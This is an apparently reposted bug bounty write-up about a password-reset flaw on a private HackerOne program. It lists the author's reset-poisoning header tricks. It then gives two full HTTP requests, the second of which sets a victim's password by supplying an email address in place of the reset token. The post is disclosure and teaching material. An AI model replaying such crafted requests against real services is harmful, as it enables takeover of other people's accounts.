Account takeover for $3000

20 hours ago 7
BOOK THIS SPACE FOR AD
ARTICLE AD

sushantdhopat

I was hunting one of private program on hackerone the scope of this program is only one domain its kind of internal admin panel hosting on staging to test.

I just randomly checked every functionality and came to the password reset functionality i tried my methodology for testing password reset functionality for ATO like changing the Host header or adding extra Host, x-forwarded-host, x-forwarded-for headers and checking this reflecting on the password reset link or adding extra email param, making an array of email [the request in JSON format], etc but nothing worked

then I came to the password reset link I just opened the link replaced new credentials and captured the request

PUT /auth/api/v1/set-password HTTP/2
Host: target.com
Cookie: cookietest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://target/auth/password-reset?email=sushant_dhopat%40wearehackerone.com&new_user=false&reset_password_token=c9b34c009ccd5d1e05f0a6c7f55811ab94e6cb45ee287f26018cfb6848c9cf52&source_url=http%3A%2F%2Fbing.com
Content-Type: application/json
Origin: https://target.com
Content-Length: 150
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

{"password":"Ssd@9619979602","reset_password_token":"c9b34c009ccd5d1e05f0a6c7f55811ab94e6cb45ee287f26018cfb6848c9cf52","source_url":"https://target.com"}

now I started playing with this request I just checked when the admin user invites different users in the team when the user opens the setup account link/email verification link then this URL is also the same as the password reset URL or when the admin user set a password for particular user then this URL also same as password reset URL

just came to my mind I replaced the param password reset to email removed reset_password_token and add there email param with the victim's email address

now request will look like this

PUT /auth/api/v1/set-password HTTP/2
Host: target.com
Cookie: cookietest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://target/auth/password-reset?email=sushant_dhopat%40wearehackerone.com&new_user=false&reset_password_token=c9b34c009ccd5d1e05f0a6c7f55811ab94e6cb45ee287f26018cfb6848c9cf52&source_url=http%3A%2F%2Fbing.com
Content-Type: application/json
Origin: https://target.com
Content-Length: 150
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

{"password":"Css@9619979602","email":"victim@gmail.com","source_url":"https://target.com"}

I sent the request and unfortunately, the backend doesn’t check or verify the password reset token I just set a new password for victim@gmail.com like this I can set new passwords for any different user without any interaction leads to a full account takeover with just an email address

conclusion:-

just play with the password reset request replace params & add params etc and see how the request is behaving

Read Entire Article